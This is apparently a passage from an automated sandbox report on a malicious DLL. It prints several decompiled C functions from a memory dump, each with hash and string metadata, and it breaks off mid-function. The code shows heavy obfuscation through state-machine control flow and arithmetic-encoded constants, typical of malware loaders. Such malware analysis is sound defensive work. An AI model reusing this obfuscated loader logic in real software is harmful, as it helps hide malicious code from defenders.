                          										_t207 = E00D407F0();
                          										_t243 =  &(_t243[1]);
                          										_t216 = 0x8a5806a;
                          										_t241 = _t241 + _t207;
                          										continue;
                          									} else {
                          										if(_t216 != 0x5e83455) {
                          											goto L17;
                          										} else {
                          											_push(_t216);
                          											_t210 = E00D407F0();
                          											_t243 =  &(_t243[1]);
                          											_t216 = 0x530d654;
                          											_t241 = _t241 + _t210;
                          											continue;
                          										}
                          									}
                          								}
                          							}
                          						}
                          						L20:
                          						return _t241;
                          					}
                          					if(_t216 == 0x8a5806a) {
                          						_push(_t216);
                          						_t198 = E00D407F0();
                          						_t243 =  &(_t243[1]);
                          						_t216 = 0x8a1c17;
                          						_t241 = _t241 + _t198;
                          						goto L17;
                          					} else {
                          						if(_t216 == 0xe6264d6) {
                          							_t199 = E00D4BE8C(_t214 + 0x4c, _v76, _v44, _v48, _v24);
                          							_t243 =  &(_t243[3]);
                          							_t216 = 0x5e83455;
                          							_t241 = _t241 + _t199;
                          							goto L1;
                          						} else {
                          							if(_t216 != 0xf218af8) {
                          								goto L17;
                          							} else {
                          								_push(_t216);
                          								_t213 = E00D407F0();
                          								_t243 =  &(_t243[1]);
                          								_t216 = 0x50fe579;
                          								_t241 = _t241 + _t213;
                          								goto L1;
                          							}
                          						}
                          					}
                          					goto L20;
                          					L17:
                          				} while (_t216 != 0x3fc4e73);
                          				goto L20;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,>$Uo>$_3$a?E$l0$rCx/
                          • API String ID: 0-1805074986
                          • Opcode ID: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
                          • Instruction ID: 6cc7407f410a7cd68e33c06ae25d32fc6929b3867500509d8c2beff4a4d86a5e
                          • Opcode Fuzzy Hash: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
                          • Instruction Fuzzy Hash: 409145B29083419BC358CF25D58A41FBBF1FBD5758F144A2DFAC696260D3B6C9088B53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00D48806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                          				char _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				void* _t156;
                          				void* _t172;
                          				void* _t174;
                          				void* _t177;
                          				void* _t182;
                          				signed int _t183;
                          				signed int _t184;
                          				signed int _t185;
                          				signed int _t186;
                          				void* _t189;
                          				intOrPtr _t216;
                          				signed int* _t219;
                          
                          				_t215 = _a8;
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(_t156);
                          				_v76 = 0x923182;
                          				_t219 =  &(( &_v140)[4]);
                          				_v72 = 0xa31cb9;
                          				_t216 = 0;
                          				_v68 = 0;
                          				_v64 = 0;
                          				_t189 = 0xe0c62fa;
                          				_v120 = 0x4473bb;
                          				_t183 = 0x46;
                          				_v120 = _v120 / _t183;
                          				_v120 = _v120 << 6;
                          				_v120 = _v120 ^ 0x003879f9;
                          				_v100 = 0x40bbdb;
                          				_t184 = 0x64;
                          				_v100 = _v100 * 0x13;
                          				_v100 = _v100 ^ 0x04c6e1a5;
                          				_v140 = 0x8d0a20;
                          				_v140 = _v140 * 0x6a;
                          				_v140 = _v140 + 0x25b5;
                          				_v140 = _v140 * 0x47;
                          				_v140 = _v140 ^ 0x32607187;
                          				_v84 = 0x381a9b;
                          				_v84 = _v84 + 0xbdad;
                          				_v84 = _v84 ^ 0x00352eaa;
                          				_v124 = 0x2aec69;
                          				_v124 = _v124 | 0x10e7a47b;
                          				_v124 = _v124 ^ 0x113e433b;
                          				_v124 = _v124 / _t184;
                          				_v124 = _v124 ^ 0x000f1a56;
                          				_v80 = 0x7d6845;
                          				_v80 = _v80 + 0xffff13df;
                          				_v80 = _v80 ^ 0x0079135d;
                          				_v92 = 0x295f3e;
                          				_v92 = _v92 + 0xbf8d;
                          				_v92 = _v92 ^ 0x0026878e;
                          				_v116 = 0x37f4f;
                          				_v116 = _v116 << 6;
                          				_v116 = _v116 + 0x3a5c;
                          				_v116 = _v116 ^ 0x00effc52;
                          				_v132 = 0xa2ba8e;
                          				_v132 = _v132 + 0x1d0a;
                          				_v132 = _v132 | 0x3462f83d;
                          				_t185 = 0x33;
                          				_v132 = _v132 * 0x30;
                          				_v132 = _v132 ^ 0xea8b61c3;
                          				_v128 = 0xc1a215;
                          				_v128 = _v128 / _t185;
                          				_v128 = _v128 | 0x8f52208d;
                          				_v128 = _v128 + 0x2564;
                          				_v128 = _v128 ^ 0x8f53844f;
                          				_v108 = 0x49ebcc;
                          				_v108 = _v108 * 0x2a;
                          				_v108 = _v108 ^ 0x0c2cea59;
                          				_v136 = 0x4a157a;
                          				_t186 = 0x59;
                          				_v136 = _v136 / _t186;
                          				_v136 = _v136 >> 1;
                          				_v136 = _v136 << 9;
                          				_v136 = _v136 ^ 0x00dde8e3;
                          				_v96 = 0x85f352;
                          				_v96 = _v96 | 0xf8883f30;
                          				_v96 = _v96 ^ 0xf88ae245;
                          				_v104 = 0xc8529d;
                          				_v104 = _v104 >> 8;
                          				_v104 = _v104 ^ 0x00006ec5;
                          				_v88 = 0xa01b;
                          				_v88 = _v88 + 0xf4b;
                          				_v88 = _v88 ^ 0x0002d8bd;
                          				_v112 = 0x376510;
                          				_v112 = _v112 >> 1;
                          				_v112 = _v112 + 0x6895;
                          				_v112 = _v112 ^ 0x001ca4c8;
                          				do {
                          					while(_t189 != 0x2d570bf) {
                          						if(_t189 == 0x2e69388) {
                          							_t174 = E00D52BF0(_v80,  &_v60, _v92, _v116, _t215 + 0xc);
                          							_t219 =  &(_t219[3]);
                          							__eflags = _t174;
                          							if(__eflags != 0) {
                          								_t189 = 0xed0c1fc;
                          								continue;
                          							}
                          						} else {
                          							if(_t189 == 0xa1356c9) {
                          								_t177 = E00D52BF0(_v140,  &_v60, _v84, _v124, _t215 + 0x48);
                          								_t219 =  &(_t219[3]);
                          								__eflags = _t177;
                          								if(__eflags != 0) {
                          									_t189 = 0x2e69388;
                          									continue;
                          								}
                          							} else {
                          								if(_t189 == 0xd5f0997) {
                          									__eflags = E00D49D3E( &_v60, _v88, __eflags, _v112, _t215);
                          									_t216 =  !=  ? 1 : _t216;
                          								} else {
                          									if(_t189 == 0xe0c62fa) {
                          										_t189 = 0xe1d6fcd;
                          										continue;
                          									} else {
                          										if(_t189 == 0xe1d6fcd) {
                          											E00D322A6(_a4, _v120,  &_v60, _v100);
                          											_t219 =  &(_t219[2]);
                          											_t189 = 0xa1356c9;
                          											continue;
                          										} else {
                          											if(_t189 != 0xed0c1fc) {
                          												goto L19;
                          											} else {
                          												_t182 = E00D52BF0(_v132,  &_v60, _v128, _v108, _t215 + 0x1c);
                          												_t219 =  &(_t219[3]);
                          												if(_t182 != 0) {
                          													_t189 = 0x2d570bf;
                          													continue;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          						L22:
                          						return _t216;
                          					}
                          					_t172 = E00D52BF0(_v136,  &_v60, _v96, _v104, _t215 + 0x3c);
                          					_t219 =  &(_t219[3]);
                          					__eflags = _t172;
                          					if(__eflags == 0) {
                          						_t189 = 0x63acd9;
                          						goto L19;
                          					} else {
                          						_t189 = 0xd5f0997;
                          						continue;
                          					}
                          					goto L22;
                          					L19:
                          					__eflags = _t189 - 0x63acd9;
                          				} while (__eflags != 0);
                          				goto L22;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $P$>_)$Eh}$\:$d%$i*
                          • API String ID: 0-2969320698
                          • Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
                          • Instruction ID: 5516e40457d3d03de8c53c9486f7833844d7cf64c8a6ddccb9aefcc8138527e8
                          • Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
                          • Instruction Fuzzy Hash: 349164B15083019FC718CF21D58692FBBE1EBC4748F04892EF59696260D7B5CA09DFA3
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00D3BFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                          				signed int _v4;
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				void* __ecx;
                          				void* _t131;
                          				signed int _t135;
                          				signed int _t139;
                          				void* _t143;
                          				void* _t146;
                          				void* _t157;
                          				signed int _t158;
                          				signed int _t159;
                          				void* _t161;
                          				signed int* _t163;
                          
                          				_t144 = _a4;
                          				_push(_a8);
                          				_t161 = __edx;
                          				_push(_a4);
                          				_push(__edx);
                          				E00D4FE29(_t131);
                          				_v56 = 0x2e7fee;
                          				_t163 =  &(( &_v68)[4]);
                          				_v56 = _v56 | 0x8bf0d90c;
                          				_v56 = _v56 + 0xffff841c;
                          				_t157 = 0;
                          				_v56 = _v56 ^ 0x8bfe8408;
                          				_t146 = 0xe8f06a4;
                          				_v20 = 0xd3cae8;
                          				_v20 = _v20 + 0xffff2712;
                          				_v20 = _v20 ^ 0x00d2f1ea;
                          				_v16 = 0xd3a0fd;
                          				_t158 = 0x75;
                          				_v16 = _v16 / _t158;
                          				_v16 = _v16 ^ 0x4001cf0d;
                          				_v40 = 0x4f1d62;
                          				_v40 = _v40 + 0xffffc4cc;
                          				_v40 = _v40 + 0xffffbca6;
                          				_v40 = _v40 ^ 0x004e2d6a;
                          				_v8 = 0x24ed33;
                          				_v8 = _v8 << 7;
                          				_v8 = _v8 ^ 0x1279d784;
                          				_v12 = 0xe170a7;
                          				_t135 = _v12;
                          				_t159 = 0x28;
                          				_t155 = _t135 % _t159;
                          				_v12 = _t135 / _t159;
                          				_v12 = _v12 ^ 0x0006bc2e;
                          				_v44 = 0x4d8c8f;
                          				_v44 = _v44 | 0xffeffd4f;
                          				_v44 = _v44 ^ 0xffe079b2;
                          				_v48 = 0xc3edaa;
                          				_v48 = _v48 >> 0x10;
                          				_v48 = _v48 + 0xd49e;
                          				_v48 = _v48 ^ 0x0004c7fe;
                          				_v68 = 0x67444f;
                          				_v68 = _v68 + 0x90d;
                          				_v68 = _v68 * 0x5b;
                          				_v68 = _v68 | 0x263824b0;
                          				_v68 = _v68 ^ 0x26bf9150;
                          				_v52 = 0xb09b3a;
                          				_v52 = _v52 ^ 0xfa5715e4;
                          				_v52 = _v52 ^ 0xfae78c15;
                          				_v24 = 0xeb1207;
                          				_v24 = _v24 + 0xffffe226;
                          				_v24 = _v24 ^ 0x00e7632f;
                          				_v28 = 0x3b6554;
                          				_v28 = _v28 ^ 0x4e84398c;
                          				_v28 = _v28 ^ 0x4eb32e0d;
                          				_v60 = 0x36daca;
                          				_v60 = _v60 ^ 0xae85a6ca;
                          				_v60 = _v60 ^ 0x532e6d02;
                          				_v60 = _v60 ^ 0xfd946988;
                          				_v64 = 0xe9416a;
                          				_v64 = _v64 >> 0xc;
                          				_v64 = _v64 >> 1;
                          				_v64 = _v64 ^ 0x000bb9db;
                          				_v32 = 0xb764c3;
                          				_v32 = _v32 << 0xe;
                          				_v32 = _v32 ^ 0xd93a5796;
                          				_v4 = 0xb5f3f2;
                          				_v4 = _v4 ^ 0xf880d4e7;
                          				_v4 = _v4 ^ 0xf834d19c;
                          				_t160 = _v4;
                          				_v36 = 0x2d4acf;
                          				_v36 = _v36 | 0x966edff9;
                          				_v36 = _v36 ^ 0x966c13d3;
                          				do {
                          					while(_t146 != 0x2926179) {
                          						if(_t146 == 0x8f0c602) {
                          							E00D51538(_v4, _v36, _t160);
                          						} else {
                          							if(_t146 == 0xb296bf4) {
                          								_t143 = E00D4C41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
                          								_t163 =  &(_t163[8]);
                          								_t157 = _t143;
                          								_t146 = 0x8f0c602;
                          								continue;
                          							} else {
                          								if(_t146 != 0xe8f06a4) {
                          									goto L10;
                          								} else {
                          									_t146 = 0x2926179;
                          									continue;
                          								}
                          							}
                          						}
                          						L13:
                          						return _t157;
                          					}
                          					_t155 = _v40;
                          					_t139 = E00D545CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
                          					_t160 = _t139;
                          					_t163 =  &(_t163[0xc]);
                          					if(_t139 == 0xffffffff) {
                          						_t146 = 0xe2d92d;
                          						goto L10;
                          					} else {
                          						_t146 = 0xb296bf4;
                          						continue;
                          					}
                          					goto L13;
                          					L10:
                          				} while (_t146 != 0xe2d92d);
                          				goto L13;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /c$3$$ODg$Te;$j-N$jA
                          • API String ID: 0-1439100758
                          • Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
                          • Instruction ID: 9ef0c0f0fa8e4a9907f47e251df95399e8f69fac4ec45ff1662b813f257b31d8
                          • Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
                          • Instruction Fuzzy Hash: E16145710183409FC798CFA5D89A81FBBE1FBC5318F405A1DF6D696260C3B5C919CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00D42142() {
                          				signed int _v4;
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				unsigned int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				unsigned int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				void* _t368;
                          				intOrPtr _t378;
                          				intOrPtr _t383;
                          				intOrPtr _t384;
                          				intOrPtr _t389;
                          				void* _t390;
                          				void* _t391;
                          				signed int _t393;
                          				signed int _t394;
                          				signed int _t395;
                          				signed int _t396;
                          				signed int _t397;
                          				signed int _t398;
                          				signed int _t399;
                          				signed int _t400;
                          				signed int _t401;
                          				signed int _t402;
                          				signed int _t403;
                          				intOrPtr _t438;
                          				intOrPtr _t439;
                          				intOrPtr _t441;
                          				void* _t444;
                          				signed int _t446;
                          				signed int* _t448;
                          
                          				_t448 =  &_v160;
                          				_v16 = 0x961399;
                          				_v12 = 0x301936;
                          				_v8 = 0xe566e6;
                          				_t391 = 0;
                          				_t444 = 0x374f925;
                          				_v4 = _v4 & 0;
                          				_v108 = 0x7426fd;
                          				_v108 = _v108 + 0xfffff8c3;
                          				_t393 = 0x2b;
                          				_push("true");
                          				_v108 = _v108 / _t393;
                          				_v108 = _v108 ^ 0x0002b357;
                          				_v156 = 0x38452;
                          				_v156 = _v156 + 0x4117;
                          				_pop(_t394);
                          				_v156 = _v156 * 0x30;
                          				_v156 = _v156 + 0xffff7c1f;
                          				_v156 = _v156 ^ 0x00b47fcf;
                          				_v152 = 0x5ef941;
                          				_v152 = _v152 * 0x43;
                          				_v152 = _v152 >> 7;
                          				_v152 = _v152 << 6;
                          				_v152 = _v152 ^ 0x0c6d9e00;
                          				_v120 = 0x18b538;
                          				_v120 = _v120 * 0x11;
                          				_v120 = _v120 + 0xffffc33e;
                          				_v120 = _v120 >> 0xd;
                          				_v120 = _v120 ^ 0x00000d1e;
                          				_v112 = 0x5e5e29;
                          				_v112 = _v112 + 0x9b22;
                          				_v112 = _v112 / _t394;
                          				_v112 = _v112 ^ 0x0002e0c4;
                          				_v144 = 0x808e79;
                          				_v144 = _v144 | 0xf9cc6bdf;
                          				_v144 = _v144 + 0xffff3e00;
                          				_v144 = _v144 << 0xf;
                          				_v144 = _v144 ^ 0x16ff716d;
                          				_v28 = 0xba41b5;
                          				_v28 = _v28 + 0xffffb1dd;
                          				_v28 = _v28 ^ 0x00b49e8e;
                          				_v68 = 0x38cb33;
                          				_v68 = _v68 >> 2;
                          				_v68 = _v68 ^ 0x000b8367;
                          				_v44 = 0xd85990;
                          				_v44 = _v44 ^ 0x9ad510f8;
                          				_v44 = _v44 ^ 0x9a039936;
                          				_v104 = 0xf87474;
                          				_t395 = 0x22;
                          				_v104 = _v104 / _t395;
                          				_v104 = _v104 >> 7;
                          				_v104 = _v104 ^ 0x000753f7;
                          				_v36 = 0x3be84a;
                          				_v36 = _v36 << 6;
                          				_v36 = _v36 ^ 0x0ef6677c;
                          				_v128 = 0x4404d4;
                          				_v128 = _v128 ^ 0xb10c689b;
                          				_t396 = 0x5e;
                          				_v128 = _v128 / _t396;
                          				_v128 = _v128 ^ 0x298e6a61;
                          				_v128 = _v128 ^ 0x28610484;
                          				_v80 = 0xdf65bd;
                          				_t397 = 0x7c;
                          				_v80 = _v80 / _t397;
                          				_v80 = _v80 ^ 0x00023fe8;
                          				_v96 = 0x7747b3;
                          				_v96 = _v96 << 0xd;
                          				_t398 = 0x29;
                          				_v96 = _v96 * 0x16;
                          				_v96 = _v96 ^ 0x052c7385;
                          				_v88 = 0xae51fb;
                          				_v88 = _v88 + 0x359a;
                          				_v88 = _v88 | 0x8b717ce6;
                          				_v88 = _v88 ^ 0x8bfa7840;
                          				_v24 = 0xcaf683;
                          				_v24 = _v24 >> 7;
                          				_v24 = _v24 ^ 0x00013e33;
                          				_v52 = 0xefed62;
                          				_v52 = _v52 | 0x058c509b;
                          				_v52 = _v52 ^ 0x05e11655;
                          				_v160 = 0xbd94ea;
                          				_v160 = _v160 + 0x2a3a;
                          				_v160 = _v160 >> 5;
                          				_v160 = _v160 + 0x96e3;
                          				_v160 = _v160 ^ 0x0003401d;
                          				_v72 = 0x73d84b;
                          				_v72 = _v72 + 0x3d83;
                          				_v72 = _v72 ^ 0x007dedc2;
                          				_v76 = 0xd9453f;
                          				_v76 = _v76 >> 1;
                          				_v76 = _v76 ^ 0x006ac7af;
                          				_v140 = 0x85d58e;
                          				_v140 = _v140 * 0x2c;
                          				_v140 = _v140 >> 4;
                          				_v140 = _v140 / _t398;
                          				_v140 = _v140 ^ 0x000cf91a;
                          				_v100 = 0x1458f8;
                          				_v100 = _v100 ^ 0xd74f5ef9;
                          				_t399 = 0x5f;
                          				_v100 = _v100 / _t399;
                          				_v100 = _v100 ^ 0x0247f1d9;
                          				_v64 = 0x476ab5;
                          				_v64 = _v64 + 0xffff3492;
                          				_v64 = _v64 ^ 0x004c13d1;
                          				_v148 = 0x4dca07;
                          				_v148 = _v148 + 0xffff4a4e;
                          				_v148 = _v148 + 0xffff2093;
                          				_v148 = _v148 ^ 0x004c8279;
                          				_v136 = 0xa6ed90;
                          				_v136 = _v136 >> 2;
                          				_v136 = _v136 | 0x950d13bb;
                          				_v136 = _v136 >> 0xf;
                          				_v136 = _v136 ^ 0x000e92a5;
                          				_v60 = 0xea20ae;
                          				_v60 = _v60 * 0x5d;
                          				_v60 = _v60 ^ 0x550aff98;
                          				_v92 = 0xe3a2d4;
                          				_v92 = _v92 >> 6;
                          				_v92 = _v92 * 0x28;
                          				_v92 = _v92 ^ 0x008d85d0;
                          				_v132 = 0x9d5db8;
                          				_v132 = _v132 + 0xffff1bd6;
                          				_t400 = 0x1b;
                          				_v132 = _v132 / _t400;
                          				_v132 = _v132 << 0xa;
                          				_v132 = _v132 ^ 0x17217366;
                          				_v56 = 0xa7c0ff;
                          				_t401 = 0x35;
                          				_v56 = _v56 / _t401;
                          				_v56 = _v56 ^ 0x000623f9;
                          				_v116 = 0xf9a70;
                          				_v116 = _v116 >> 0xa;
                          				_v116 = _v116 >> 5;
                          				_v116 = _v116 + 0xffffd532;
                          				_v116 = _v116 ^ 0xfff34a0b;
                          				_v124 = 0xd1e957;
                          				_v124 = _v124 << 3;
                          				_t402 = 0x76;
                          				_v124 = _v124 / _t402;
                          				_v124 = _v124 + 0x1a27;
                          				_v124 = _v124 ^ 0x000dfee3;
                          				_v84 = 0x8b01d8;
                          				_t403 = 0x34;
                          				_v84 = _v84 * 0x70;
                          				_v84 = _v84 / _t403;
                          				_v84 = _v84 ^ 0x0120e28f;
                          				_v32 = 0xcb988c;
                          				_v32 = _v32 ^ 0x945cb942;
                          				_v32 = _v32 ^ 0x9495c850;
                          				_v40 = 0x79d8e1;
                          				_v40 = _v40 >> 9;
                          				_v40 = _v40 ^ 0x000c7724;
                          				_v48 = 0xc03196;
                          				_v48 = _v48 ^ 0x1279a3f1;
                          				_v48 = _v48 ^ 0x12baef9a;
                          				while(1) {
                          					L1:
                          					_t368 = 0x9ae396c;
                          					do {
                          						L2:
                          						if(_t444 == 0x19911bc) {
                          							_push(_v52);
                          							_push(_v24);
                          							_push(_v88);
                          							_t446 = E00D4E1F8(0xd31a20, _v96, __eflags);
                          							__eflags = E00D3738A(_v160, _t446, _v72, _v108,  &_v20, 0, _v76) - _v156;
                          							_t403 = _t446;
                          							_t444 =  ==  ? 0x9ae396c : 0x7737a40;
                          							E00D4FECB(_t403, _v140, _v100, _v64, _v148);
                          							_t448 =  &(_t448[0xb]);
                          							_t368 = 0x9ae396c;
                          							goto L12;
                          						}
                          						if(_t444 == 0x374f925) {
                          							_push(_t403);
                          							_push(_t403);
                          							_t378 = E00D3C5D8(0x44);
                          							 *0xd56220 = _t378;
                          							 *((intOrPtr*)(_t378 + 0x28)) = 0x4000;
                          							_t383 =  *0xd56220; // 0x0
                          							_t384 = E00D3C5D8( *((intOrPtr*)(_t383 + 0x28)));
                          							_t438 =  *0xd56220; // 0x0
                          							_t448 =  &(_t448[4]);
                          							_t444 = 0x19911bc;
                          							_t403 =  *((intOrPtr*)(_t438 + 0x28)) + _t384;
                          							 *((intOrPtr*)(_t438 + 0x24)) = _t384;
                          							 *((intOrPtr*)(_t438 + 0x14)) = _t384;
                          							 *((intOrPtr*)(_t438 + 0x1c)) = _t384;
                          							 *(_t438 + 0x20) = _t403;
                          							while(1) {
                          								L1:
                          								_t368 = 0x9ae396c;
                          								goto L2;
                          							}
                          						}
                          						if(_t444 == 0x7737a40) {
                          							_t439 =  *0xd56220; // 0x0
                          							E00D52B09(_v116,  *((intOrPtr*)(_t439 + 0x24)), _v124, _v84);
                          							_t441 =  *0xd56220; // 0x0
                          							E00D52B09(_v32, _t441, _v40, _v48);
                          							L16:
                          							return _t391;
                          						}
                          						if(_t444 == 0x9042860) {
                          							E00D3F7FE(_v132, _v20, _v56, _v112);
                          							goto L16;
                          						}
                          						if(_t444 != _t368) {
                          							goto L12;
                          						}
                          						_t389 =  *0xd56220; // 0x0
                          						_t403 = _v20;
                          						_t390 = E00D48B9E(_t403, _v152, _v136, _v60,  *((intOrPtr*)(_t389 + 0x28)),  *((intOrPtr*)(_t389 + 0x24)), _v92);
                          						_t448 =  &(_t448[5]);
                          						if(_t390 != _v120) {
                          							_t444 = 0x7737a40;
                          						} else {
                          							_t444 = 0x9042860;
                          							_t391 = 1;
                          						}
                          						goto L1;
                          						L12:
                          						__eflags = _t444 - 0xe3acfc2;
                          					} while (__eflags != 0);
                          					goto L16;
                          				}
                          			}


                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )^^$:*$J;$b$f
                          • API String ID: 0-204930537
                          • Opcode ID: 7586446c25d515a37242616d025c1812651200a60cb1bc55b6da1fef037ed5d0
                          • Instruction ID: 75b9693776741593433a5f435e1a3d23dd2823cef950e247bc5d61b958b5083b
                          • Opcode Fuzzy Hash: 7586446c25d515a37242616d025c1812651200a60cb1bc55b6da1fef037ed5d0
                          • Instruction Fuzzy Hash: 33F12FB16083809FC368CF25D58AA0BFBF1FBC4718F50891DF5998A261DBB59949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00D52009() {
                          				char _v520;
                          				char _v1040;
                          				signed int _v1044;
                          				intOrPtr _v1048;
                          				intOrPtr _v1052;
                          				signed int _v1056;
                          				signed int _v1060;
                          				signed int _v1064;
                          				signed int _v1068;
                          				signed int _v1072;
                          				signed int _v1076;
                          				signed int _v1080;
                          				signed int _v1084;
                          				signed int _v1088;
                          				signed int _v1092;
                          				signed int _v1096;
                          				signed int _v1100;
                          				signed int _v1104;
                          				signed int _v1108;
                          				signed int _v1112;
                          				signed int _v1116;
                          				signed int _v1120;
                          				signed int _v1124;
                          				signed int _v1128;
                          				signed int _v1132;
                          				unsigned int _v1136;
                          				signed int _v1140;
                          				signed int _v1144;
                          				signed int _v1148;
                          				signed int _v1152;
                          				signed int _v1156;
                          				signed int _v1160;
                          				signed int _v1164;
                          				signed int _v1168;
                          				signed int _v1172;
                          				unsigned int _v1176;
                          				signed int _v1180;
                          				signed int _v1184;
                          				void* _t310;
                          				intOrPtr _t312;
                          				void* _t315;
                          				void* _t319;
                          				void* _t320;
                          				intOrPtr _t321;
                          				signed int _t326;
                          				signed int _t327;
                          				signed int _t328;
                          				signed int _t329;
                          				signed int _t330;
                          				signed int _t331;
                          				intOrPtr _t333;
                          				intOrPtr _t340;
                          				void* _t364;
                          				signed int* _t368;
                          
                          				_t368 =  &_v1184;
                          				_v1044 = _v1044 & 0x00000000;
                          				_v1052 = 0x35c0cd;
                          				_v1048 = 0xa3be33;
                          				_v1136 = 0x5ade05;
                          				_v1136 = _v1136 + 0xffffc499;
                          				_v1136 = _v1136 >> 0xf;
                          				_v1136 = _v1136 ^ 0x000b842c;
                          				_v1180 = 0x412a9d;
                          				_t326 = 0x29;
                          				_v1180 = _v1180 / _t326;
                          				_v1180 = _v1180 << 0xb;
                          				_t364 = 0xe958b9c;
                          				_v1180 = _v1180 + 0xffff9519;
                          				_v1180 = _v1180 ^ 0x0cbc23a5;
                          				_v1156 = 0xd33cfc;
                          				_v1156 = _v1156 + 0xffff4a87;
                          				_v1156 = _v1156 ^ 0xbe5aeb75;
                          				_t327 = 0xb;
                          				_v1156 = _v1156 * 0x62;
                          				_v1156 = _v1156 ^ 0xf0302705;
                          				_v1148 = 0xf18826;
                          				_v1148 = _v1148 << 1;
                          				_v1148 = _v1148 >> 0xa;
                          				_v1148 = _v1148 + 0xffff44eb;
                          				_v1148 = _v1148 ^ 0xfffe3e21;
                          				_v1112 = 0x4e0c4f;
                          				_v1112 = _v1112 + 0x7be6;
                          				_v1112 = _v1112 ^ 0x004f5571;
                          				_v1128 = 0xa7ca39;
                          				_v1128 = _v1128 + 0xffffebca;
                          				_v1128 = _v1128 / _t327;
                          				_v1128 = _v1128 ^ 0x000be641;
                          				_v1176 = 0xb5e613;
                          				_v1176 = _v1176 << 0xb;
                          				_v1176 = _v1176 << 0xb;
                          				_v1176 = _v1176 >> 3;
                          				_v1176 = _v1176 ^ 0x109d8d71;
                          				_v1100 = 0x8f570;
                          				_v1100 = _v1100 << 6;
                          				_v1100 = _v1100 ^ 0x02300751;
                          				_v1184 = 0x7a4582;
                          				_v1184 = _v1184 >> 0xc;
                          				_v1184 = _v1184 + 0xffff757f;
                          				_v1184 = _v1184 + 0xcda4;
                          				_v1184 = _v1184 ^ 0x0000a546;
                          				_v1140 = 0x8d05f4;
